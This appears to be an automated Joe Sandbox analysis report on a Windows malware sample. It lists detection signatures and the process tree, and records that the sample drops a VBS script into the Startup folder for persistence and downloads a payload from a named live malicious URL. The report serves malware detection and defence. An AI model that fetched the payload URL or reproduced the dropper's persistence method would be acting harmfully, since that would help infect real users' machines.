Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3pwbTZtiDu.exe

Overview

General Information

Sample name:3pwbTZtiDu.exe
renamed because original name is a hash value
Original sample name:5f031a5e3de3e7df29a8ef6adb4164a620592ed3a5ee8735d779984b9eafc4c5.exe
Analysis ID:1588190
MD5:3209478af7484c36341d0939fb84cb88
SHA1:7d4c3ad42d2d9f8ee8af1a92f28ab2651e799483
SHA256:5f031a5e3de3e7df29a8ef6adb4164a620592ed3a5ee8735d779984b9eafc4c5
Tags:exeuser-adrian__luca
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
AI detected suspicious sample
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 3pwbTZtiDu.exe (PID: 6656 cmdline: "C:\Users\user\Desktop\3pwbTZtiDu.exe" MD5: 3209478AF7484C36341D0939FB84CB88)
    • WerFault.exe (PID: 6956 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6656 -s 2296 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • wscript.exe (PID: 6320 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DisplayName.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • DisplayName.exe (PID: 5600 cmdline: "C:\Users\user\AppData\Roaming\DisplayName.exe" MD5: 3209478AF7484C36341D0939FB84CB88)
      • WerFault.exe (PID: 5400 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 2256 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2613644694.0000000005BA0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.2592427552.0000000002857000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000009.00000002.2788513573.00000000034EA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000000.00000002.2611963383.0000000003818000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000009.00000002.2773183696.00000000024D7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.2.DisplayName.exe.34ea678.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.3pwbTZtiDu.exe.5ba0000.8.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.3pwbTZtiDu.exe.386a678.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DisplayName.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DisplayName.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DisplayName.vbs" , ProcessId: 6320, ProcessName: wscript.exe
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DisplayName.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DisplayName.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DisplayName.vbs" , ProcessId: 6320, ProcessName: wscript.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Drops script at startup location
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\3pwbTZtiDu.exe, ProcessId: 6656, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DisplayName.vbs

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: 3pwbTZtiDu.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: https://www.new.eventawardsrussia.com/wp-includes/Wuuvrl.datAvira URL Cloud: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeAvira: detection malicious, Label: HEUR/AGEN.1351837
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeReversingLabs: Detection: 69%
                  Multi AV Scanner detection for submitted file
                  Source: 3pwbTZtiDu.exeReversingLabs: Detection: 69%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: 3pwbTZtiDu.exeJoe Sandbox ML: detected
                  Source: 3pwbTZtiDu.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 5.23.51.54:443 -> 192.168.2.12:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 5.23.51.54:443 -> 192.168.2.12:49720 version: TLS 1.2
                  Source: 3pwbTZtiDu.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 3pwbTZtiDu.exe, 00000000.00000002.2591097026.0000000000A90000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 3pwbTZtiDu.exe, 00000000.00000002.2612911375.00000000058A0000.00000004.00000020.00020000.00000000.sdmp, DisplayName.exe, 00000009.00000002.2789351577.0000000005420000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb\9gp& source: DisplayName.exe, 00000009.00000002.2771699318.00000000006E0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb? source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 3pwbTZtiDu.exe, 00000000.00000002.2592427552.0000000002946000.00000004.00000800.00020000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2614175348.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, DisplayName.exe, 00000009.00000002.2773183696.00000000025C3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Roaming\DisplayName.PDBP source: DisplayName.exe, 00000009.00000002.2771699318.0000000000787000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbs source: 3pwbTZtiDu.exe, 00000000.00000002.2612911375.00000000058A0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbH%Bp source: DisplayName.exe, 00000009.00000002.2771699318.00000000006E0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 3pwbTZtiDu.exe, 00000000.00000002.2592427552.0000000002946000.00000004.00000800.00020000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2614175348.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, DisplayName.exe, 00000009.00000002.2773183696.00000000025C3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: DisplayName.exe, 00000009.00000002.2771699318.00000000006E0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: 3pwbTZtiDu.exe, 00000000.00000002.2613752688.0000000005C00000.00000004.08000000.00040000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003933000.00000004.00000800.00020000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003818000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: O8o0C:\Windows\mscorlib.pdb source: 3pwbTZtiDu.exe, 00000000.00000002.2590976222.00000000008F7000.00000004.00000010.00020000.00000000.sdmp, DisplayName.exe, 00000009.00000002.2771516501.00000000004F7000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: DisplayName.exe, 00000009.00000002.2771699318.0000000000787000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: 3pwbTZtiDu.exe, 00000000.00000002.2613752688.0000000005C00000.00000004.08000000.00040000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003933000.00000004.00000800.00020000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003818000.00000004.00000800.00020000.00000000.sdmp, WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: System.Configuration.pdb source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb! source: 3pwbTZtiDu.exe, 00000000.00000002.2591097026.0000000000B45000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdbMZ@ source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: System.Configuration.pdbp source: WER6AAF.tmp.dmp.5.dr
                  Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 3pwbTZtiDu.exe, 00000000.00000002.2612911375.00000000058A0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: System.pdb source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: System.Core.ni.pdb source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: %%.pdb source: 3pwbTZtiDu.exe, 00000000.00000002.2590976222.00000000008F7000.00000004.00000010.00020000.00000000.sdmp, DisplayName.exe, 00000009.00000002.2771516501.00000000004F7000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.pdb source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: C:\Users\user\AppData\Roaming\DisplayName.PDB source: DisplayName.exe, 00000009.00000002.2771516501.00000000004F7000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.Win32.TaskScheduler.pdb source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: mscorlib.pdb source: DisplayName.exe, 00000009.00000002.2789351577.0000000005420000.00000004.00000020.00020000.00000000.sdmp, WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: System.Configuration.pdbMZ source: WERC448.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 3pwbTZtiDu.exe, 00000000.00000002.2612911375.00000000058A0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdbRSDSw source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: mscorlib.ni.pdb source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 3pwbTZtiDu.exe, 00000000.00000002.2591097026.0000000000B45000.00000004.00000020.00020000.00000000.sdmp, DisplayName.exe, 00000009.00000002.2789351577.0000000005420000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Users\user\Desktop\3pwbTZtiDu.PDB source: 3pwbTZtiDu.exe, 00000000.00000002.2612911375.0000000005911000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbQD source: DisplayName.exe, 00000009.00000002.2789351577.0000000005420000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Desktop\3pwbTZtiDu.PDB source: 3pwbTZtiDu.exe, 00000000.00000002.2590976222.00000000008F7000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: System.ni.pdb source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_05AA0764
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_05AA0770
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 4x nop then jmp 05C6F08Ah0_2_05C6EDE1
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 4x nop then jmp 05C6F08Ah0_2_05C6EDF0
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 4x nop then jmp 05C67F9Fh0_2_05C67F40
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 4x nop then jmp 05C67F9Fh0_2_05C67F30
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h9_2_05620764
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h9_2_05620770
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 4x nop then jmp 057EF08Ah9_2_057EEDF0
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 4x nop then jmp 057EF08Ah9_2_057EEDE1
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 4x nop then jmp 057E7F9Fh9_2_057E7F40
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 4x nop then jmp 057E7F9Fh9_2_057E7F36
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 4x nop then jmp 057EF08Ah9_2_057EF119
                  Source: global trafficHTTP traffic detected: GET /wp-includes/Wuuvrl.dat HTTP/1.1Host: www.new.eventawardsrussia.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wp-includes/Wuuvrl.dat HTTP/1.1Host: www.new.eventawardsrussia.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 5.23.51.54 5.23.51.54
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /wp-includes/Wuuvrl.dat HTTP/1.1Host: www.new.eventawardsrussia.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wp-includes/Wuuvrl.dat HTTP/1.1Host: www.new.eventawardsrussia.comConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: www.new.eventawardsrussia.com
                  Source: 3pwbTZtiDu.exe, 00000000.00000002.2592427552.0000000002811000.00000004.00000800.00020000.00000000.sdmp, DisplayName.exe, 00000009.00000002.2773183696.0000000002491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                  Source: 3pwbTZtiDu.exe, 00000000.00000002.2613752688.0000000005C00000.00000004.08000000.00040000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003933000.00000004.00000800.00020000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: 3pwbTZtiDu.exe, 00000000.00000002.2613752688.0000000005C00000.00000004.08000000.00040000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003933000.00000004.00000800.00020000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003818000.00000004.00000800.00020000.00000000.sdmp, DisplayName.exe, 00000009.00000002.2788513573.00000000035F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: 3pwbTZtiDu.exe, 00000000.00000002.2613752688.0000000005C00000.00000004.08000000.00040000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003933000.00000004.00000800.00020000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: 3pwbTZtiDu.exe, 00000000.00000002.2613752688.0000000005C00000.00000004.08000000.00040000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003933000.00000004.00000800.00020000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: 3pwbTZtiDu.exe, 00000000.00000002.2592427552.0000000002857000.00000004.00000800.00020000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2613752688.0000000005C00000.00000004.08000000.00040000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003933000.00000004.00000800.00020000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003818000.00000004.00000800.00020000.00000000.sdmp, DisplayName.exe, 00000009.00000002.2773183696.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: 3pwbTZtiDu.exe, 00000000.00000002.2613752688.0000000005C00000.00000004.08000000.00040000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003933000.00000004.00000800.00020000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: 3pwbTZtiDu.exe, 00000000.00000002.2592427552.0000000002811000.00000004.00000800.00020000.00000000.sdmp, DisplayName.exe, 00000009.00000002.2773183696.0000000002491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.new.eventawardsrussia.com
                  Source: 3pwbTZtiDu.exe, DisplayName.exe.0.drString found in binary or memory: https://www.new.eventawardsrussia.com/wp-includes/Wuuvrl.dat
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownHTTPS traffic detected: 5.23.51.54:443 -> 192.168.2.12:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 5.23.51.54:443 -> 192.168.2.12:49720 version: TLS 1.2

                  System Summary

                  barindex
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_027B2B470_2_027B2B47
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_027B31D20_2_027B31D2
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_027B1F280_2_027B1F28
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_027B1F180_2_027B1F18
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_027B342C0_2_027B342C
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_027B24B30_2_027B24B3
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_027B2D290_2_027B2D29
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05AA8DB30_2_05AA8DB3
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05AA743F0_2_05AA743F
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05AA52900_2_05AA5290
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05AAB5600_2_05AAB560
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05AAB5700_2_05AAB570
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05AAD7000_2_05AAD700
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05AAD7100_2_05AAD710
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05AA1BE80_2_05AA1BE8
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05AA1BD80_2_05AA1BD8
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05B900400_2_05B90040
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05B97B700_2_05B97B70
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05B964980_2_05B96498
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05B9648A0_2_05B9648A
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05B9800F0_2_05B9800F
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05B900060_2_05B90006
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05B97B600_2_05B97B60
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05C6A2100_2_05C6A210
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05C6EDE10_2_05C6EDE1
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05C6EDF00_2_05C6EDF0
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05C6E5880_2_05C6E588
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05C6E5790_2_05C6E579
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05C6C6500_2_05C6C650
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05C6C6600_2_05C6C660
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05C648F80_2_05C648F8
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05C75D200_2_05C75D20
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05C760470_2_05C76047
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05C773280_2_05C77328
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05C729080_2_05C72908
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05C718980_2_05C71898
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05CB51CB0_2_05CB51CB
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05CB71A90_2_05CB71A9
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05CB71B80_2_05CB71B8
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05F9E4B00_2_05F9E4B0
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05F9E1100_2_05F9E110
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05F800400_2_05F80040
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05F800060_2_05F80006
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05F83B670_2_05F83B67
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_009931D29_2_009931D2
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_00992B479_2_00992B47
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_009924B29_2_009924B2
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_0099342C9_2_0099342C
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_00992D299_2_00992D29
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_00991F189_2_00991F18
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_00991F289_2_00991F28
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_05628DB39_2_05628DB3
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_0562743F9_2_0562743F
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_056252909_2_05625290
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_0562B5609_2_0562B560
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_0562B5709_2_0562B570
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_0562D7009_2_0562D700
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_0562D7109_2_0562D710
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_05621BE89_2_05621BE8
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_05621BD89_2_05621BD8
